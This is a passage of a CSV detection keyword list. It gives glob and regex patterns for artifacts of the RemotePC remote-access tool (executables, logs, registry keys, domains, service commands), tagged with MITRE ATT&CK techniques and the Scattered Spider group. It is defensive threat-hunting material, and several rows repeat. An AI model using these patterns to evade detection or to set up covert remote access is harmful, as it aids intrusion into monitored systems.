tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCCoreViewerL.exe*",".{0,1000}\\RPCCoreViewerL\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcDND_Console.exe*",".{0,1000}\\RpcDND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - 
T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcDND_Console.exe*",".{0,1000}\\RpcDND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCDownloader.exe*",".{0,1000}\\RPCDownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rpcdownloader.exe*",".{0,1000}\\rpcdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCDownloaderLogFile.txt*",".{0,1000}\\RPCDownloaderLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCDownloaderLogFile.txt*",".{0,1000}\\RPCDownloaderLogFile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCDragDrop.txt*",".{0,1000}\\RPCDragDrop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCFirewallAttended.exe*",".{0,1000}\\RPCFirewallAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCFireWallRule.exe*",".{0,1000}\\RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCFireWallRule.exe*",".{0,1000}\\RPCFireWallRule\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCFireWallRulelogfile.txt*",".{0,1000}\\RPCFireWallRulelogfile\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCKeyMouseHandler.txt*",".{0,1000}\\RPCKeyMouseHandler\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTABootstrapper.exe*",".{0,1000}\\RPCOTABootstrapper\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\RPCOTADesktop.exe*",".{0,1000}\\RPCOTADesktop\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTADesktopUAC.exe*",".{0,1000}\\RPCOTADesktopUAC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcOTADND_Console.exe*",".{0,1000}\\RpcOTADND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTAElevator.exe*",".{0,1000}\\RPCOTAElevator\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTAFTHost.exe*",".{0,1000}\\RPCOTAFTHost\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTAKillService.exe*",".{0,1000}\\RPCOTAKillService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTARelauncher.exe*",".{0,1000}\\RPCOTARelauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTAService.exe*",".{0,1000}\\RPCOTAService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTAServiceUAC.exe*",".{0,1000}\\RPCOTAServiceUAC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTAUtilityHost.exe*",".{0,1000}\\RPCOTAUtilityHost\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCOTAViewerHostKeyPopup.exe*",".{0,1000}\\RPCOTAViewerHostKeyPopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPerformanceService.exe*",".{0,1000}\\RPCPerformanceService\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPerformanceService.log*",".{0,1000}\\RPCPerformanceService\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\RPCPerformanceService.log*",".{0,1000}\\RPCPerformanceService\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPerfViewer.exe*",".{0,1000}\\RPCPerfViewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rpcperfviewer.exe*",".{0,1000}\\rpcperfviewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPerfViewer.log*",".{0,1000}\\RPCPerfViewer\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPing.txt*",".{0,1000}\\RPCPing\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPreUninstall.log*",".{0,1000}\\RPCPreUninstall\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPreUninstall.log*",".{0,1000}\\RPCPreUninstall\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPrinterDownloader.exe*",".{0,1000}\\RPCPrinterDownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPrinterDownloader.txt*",".{0,1000}\\RPCPrinterDownloader\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCPrinterDownloader.txt*",".{0,1000}\\RPCPrinterDownloader\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCProxyLatency.exe*",".{0,1000}\\RPCProxyLatency\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCProxyLatency.exe*",".{0,1000}\\RPCProxyLatency\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCProxyLatencyAttended.exe*",".{0,1000}\\RPCProxyLatencyAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCSettings.ini*",".{0,1000}\\RPCSettings\.ini.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCSettings.ini*",".{0,1000}\\RPCSettings\.ini.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RpcStickyNotes.exe*",".{0,1000}\\RpcStickyNotes\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCSuite_*_Inc.log*",".{0,1000}\\RPCSuite_.{0,1000}_Inc\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RPCsuiteLaunch.txt*",".{0,1000}\\RPCsuiteLaunch\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Schedule\TaskCache\Tree\RemotePC*",".{0,1000}\\Schedule\\TaskCache\\Tree\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" 
"*\Services\RemotePCAttendedService*",".{0,1000}\\Services\\RemotePCAttendedService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Tools\Ninja.WebSockets.dll*",".{0,1000}\\Tools\\Ninja\.WebSockets\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Tracing\RemotePCLauncher_*",".{0,1000}\\Tracing\\RemotePCLauncher_.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Tracing\RemotePCUIU*",".{0,1000}\\Tracing\\RemotePCUIU.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\TransferClient.exe.config*",".{0,1000}\\TransferClient\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\TransferServer.exe.config*",".{0,1000}\\TransferServer\.exe\.config.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\ViewerHostKeyPopup.exe*",".{0,1000}\\ViewerHostKeyPopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\viewerhostkeypopup.exe*",".{0,1000}\\viewerhostkeypopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ViewerHostKeyPopup.exe*",".{0,1000}\\ViewerHostKeyPopup\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\WOW6432Node\RemotePC*",".{0,1000}\\WOW6432Node\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*AppData\Local\Temp\RemotePC Attended*",".{0,1000}AppData\\Local\\Temp\\RemotePC\sAttended.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*download.remotepc.com*",".{0,1000}download\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*download.remotepc.com*",".{0,1000}download\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A" "*HKCR\REMOTEPC*",".{0,1000}HKCR\\REMOTEPC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*https://login.remotepc.com/rpcnew*",".{0,1000}https\:\/\/login\.remotepc\.com\/rpcnew.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ip.remotepc.com*",".{0,1000}ip\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A" "*login.remotepc.com*",".{0,1000}login\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A" "*net start RPCPerformanceService*",".{0,1000}net\sstart\sRPCPerformanceService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*program files 
(x86)\remotepc\*",".{0,1000}program\sfiles\s\(x86\)\\remotepc\\.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ProgramData\RemotePC Performance*",".{0,1000}ProgramData\\RemotePC\sPerformance.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ProgramData\RemotePC*",".{0,1000}ProgramData\\RemotePC.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePC (1).exe*",".{0,1000}RemotePC\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePC Performance Printer.url*",".{0,1000}RemotePC\sPerformance\sPrinter\.url.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePC* - A new computer has been added to your account*",".{0,1000}RemotePC.{0,1000}\s\-\sA\snew\scomputer\shas\sbeen\sadded\sto\syour\saccount.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePC.exe *",".{0,1000}RemotePC\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePC.WebSockets.dll*",".{0,1000}RemotePC\.WebSockets\.dll.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePC\REMOTE~2.DLL*",".{0,1000}RemotePC\\REMOTE\~2\.DLL.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCAttended.exe*",".{0,1000}RemotePCAttended\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCAttendedService*",".{0,1000}RemotePCAttendedService.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCBlackScreenApp.exe*",".{0,1000}RemotePCBlackScreenApp\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*RemotePCCopyPaste.txt*",".{0,1000}RemotePCCopyPaste\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCDesktop.exe*",".{0,1000}RemotePCDesktop\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCDesktop.exe*",".{0,1000}RemotePCDesktop\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCDesktop.txt*",".{0,1000}RemotePCDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCHDDesktop.txt*",".{0,1000}RemotePCHDDesktop\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCHDService.txt*",".{0,1000}RemotePCHDService\.txt.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*remotepclauncher.exe *",".{0,1000}remotepclauncher\.exe\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - 
abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCModules.log*",".{0,1000}RemotePCModules\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCPerformanceWebLauncher.exe*",".{0,1000}RemotePCPerformanceWebLauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemotePCPerformanceWebLauncher.log*",".{0,1000}RemotePCPerformanceWebLauncher\.log.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 